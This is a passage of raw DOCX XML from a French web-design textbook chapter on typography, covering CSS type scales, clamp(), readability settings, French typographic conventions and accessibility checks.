        <w:t xml:space="preserve">  --taille-1: calc(var(--taille-0) * var(--ratio));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-2: calc(var(--taille-1) * var(--ratio));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-3: calc(var(--taille-2) * var(--ratio));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille--1: calc(var(--taille-0) / var(--ratio));</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>h1 { font-size: var(--taille-3); }</w:t>
        <w:br/>
        <w:t>h2 { font-size: var(--taille-2); }</w:t>
        <w:br/>
        <w:t>h3 { font-size: var(--taille-1); }</w:t>
        <w:br/>
        <w:t>small { font-size: var(--taille--1); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend l'échelle fluide entre deux bornes, sans media query :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une taille fluide, bornée dans les deux sens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h1 {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: clamp(2rem, 1.4rem + 3vw, 3.5rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.1;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La borne minimale garantit la lisibilité sur petit écran ; la borne maximale évite les titres démesurés sur grand moniteur. Entre les deux, la taille suit la largeur de la fenêtre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.4 Lisibilité : interligne, mesure, espacement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois réglages déterminent le confort de lecture. Ils se règlent ensemble, car ils se compensent : une police large demande un interligne plus faible, une mesure courte supporte un interligne plus serré.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.39 — Sept réglages de lisibilité</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41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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2415"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>line-height</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1,5 à 1,7 pour le corps</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Aération verticale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="241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max-width</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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45 à 75 caractères</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Retour à la ligne naturel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2415"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>letter-spacing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0 à 0,02 em</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Micro-aération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="241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word-spacing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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0 par défaut</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À ajuster rarement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2415"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>text-align</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</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Évite les rivières</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="241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hyphens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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auto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lang</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Césure correcte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2415"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>text-wrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pretty</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>balance</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Évite les veuves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le réglage de base d'un texte long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body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: 1.0625rem;      /* 17 px */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.65;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-width: 68ch;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline: auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline: 1.25rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: left;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hyphens: auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow-wrap: break-word;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>h1, h2, h3 {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.15;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-wrap: balance;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  letter-spacing: -0.01em;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte justifié (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text-align: justify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) est déconseillé sur le Web : sans césure fine, il crée des espaces irréguliers et des « rivières » blanches qui gênent la lecture, particulièrement pour les personnes dyslexiques.</w:t>
      </w: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LE TEST DES 60 CARACTÈRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Comptez les caractères de trois lignes consécutives. Entre 55 et 75, la mesure est bonne. En dessous, l'œil change de ligne trop souvent ; au-dessus, il perd le début de la ligne suivante.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.5 Typographie française</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les règles typographiques françaises diffèrent de l'anglais. Elles s'appliquent au contenu, pas seulement aux documents imprimés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.40 — Sept règles typographiques françaises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Règle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Correct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Incorrect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Espace avant les deux-points</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Exemple&amp;nbsp;: ceci</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Exemple: ceci</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Guillemets français</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 texte »</w:t>
            </w:r>
          </w:p>
        </w:tc>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"texte"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Espace insécable dans les guillemets</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«&amp;nbsp;texte&amp;nbsp;»</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«texte»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Tiret cadratin pour l'incise</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Le site — refondu — plaît.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Le site - refondu - plaît.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nombre et unité</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12&amp;nbsp;kg</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12kg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Pourcentage</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18&amp;nbsp;%</w:t>
            </w:r>
          </w:p>
        </w:tc>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18%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Heure</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14&amp;nbsp;h&amp;nbsp;30</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14h30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux propriétés qui améliorent la composition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Césure correcte : la langue doit être déclarée */</w:t>
        <w:br/>
        <w:t>html { hyphens: auto; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Ponctuation orpheline : éviter qu'un point seul passe à la ligne */</w:t>
        <w:br/>
        <w:t>p { text-wrap: pretty; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.6 Typographie et accessibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La lisibilité n'est pas qu'une affaire d'esthétique. Quatre facteurs conditionnent l'accès au texte pour les personnes malvoyantes, dyslexiques ou âgées.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Taille</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : au moins 16 px pour le corps, et une mise à l'échelle qui respecte le zoom à 200 %.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contraste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : 4,5:1 minimum pour le texte courant, 3:1 pour les grands textes.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Espacement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : un interligne de 1,5 minimum, un espacement des paragraphes visible.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Alignement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : à gauche, sans justification, avec des lignes courtes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux préférences système à honorer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Respecter les préférences de mouvement et de contraste */</w:t>
        <w:br/>
        <w:t>@media (prefers-reduced-motion: reduce) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *, *::before, *::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    animation-duration: 0.01ms !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    transition-duration: 0.01ms !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-contrast: more) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  :root { --couleur-texte: #000; --couleur-fond: #fff; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le zoom navigateur ne doit jamais être bloqué. Testez votre page à 200 % : le texte doit rester lisible, les colonnes se réorganiser et aucun contenu ne doit être tronqué.</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CONTRÔLE TYPOGRAPHIQUE EN CINQ POINTS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 corps fait-il au moins 16 px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La mesure reste-t-elle sous 75 caractères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L'interligne est-il au moins de 1,5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 contraste atteint-il 4,5:1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La page reste-t-elle lisible à 200 % de zoom ?</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pile système évite tout téléchargement ; une police web se justifie.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police variable remplace plusieurs fichiers statiques.</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font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend le texte lisible immédiatement.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échelle modulaire remplace les tailles arbitraires.</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clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit une typographie fluide et bornée.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Interligne, mesure et alignement se règlent ensemble.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typographie française exige espaces insécables et guillemets adaptés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte est lisible. Reste à lui donner de la couleur et du relief : le chapitre suivant traite couleurs, contrastes et arrière-plans.</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11.1 — Construire une échelle fluide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Créez une échelle typographique de cinq niveaux, fluide entre 360 et 1440 pixels.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
